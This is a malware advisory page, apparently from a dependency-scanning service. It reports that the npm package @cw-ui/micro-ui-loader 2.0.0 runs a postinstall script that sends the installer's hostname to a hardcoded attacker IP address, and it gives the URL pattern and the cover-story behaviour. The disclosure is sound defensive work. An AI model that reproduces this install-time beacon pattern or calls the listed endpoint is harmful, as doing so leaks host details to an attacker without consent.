npm

@cw-ui/micro-ui-loader @2.0.0

Vulnerability report · Last retrieved from osv.dev July 15, 2026 at 3:50 AM UTC

Malicious

OSV ID

MAL-2026-10557

Ecosystem

npm

Summary

On npm install , postinstall.js reads the installer's hostname via os.hostname() and sends it as a query parameter to a hardcoded bare-IP HTTP endpoint: http://37.60.255.218/skybackground.png?display=${encodeURIComponent(displayProfile)} . The response is saved locally as downloaded-image.jpg as a cover story. The package's README advertises 'Simple Text Utils' for string operations (capitalize/reverse/wordCount), and index.js exports only downloadImage — neither matches the stated purpose. The author field is the placeholder 'Your Name'. The combination of hardcoded bare-IP destination, plain HTTP, install-time auto-execution, host-identifier exfiltration, README/behavior mismatch, and placeholder metadata is a recon beacon shape, not legitimate functionality. Installing this package leaks the host's identifier to an attacker-controlled IP without consent.

Source: amazon-inspector (b558c8d90850ea9817e236b445ba2bc1020a35a81a099a5e1575ef705b00bd39)

Protect your entire dependency tree

Scan your lock files automatically on every PR. Block malicious packages before they reach production.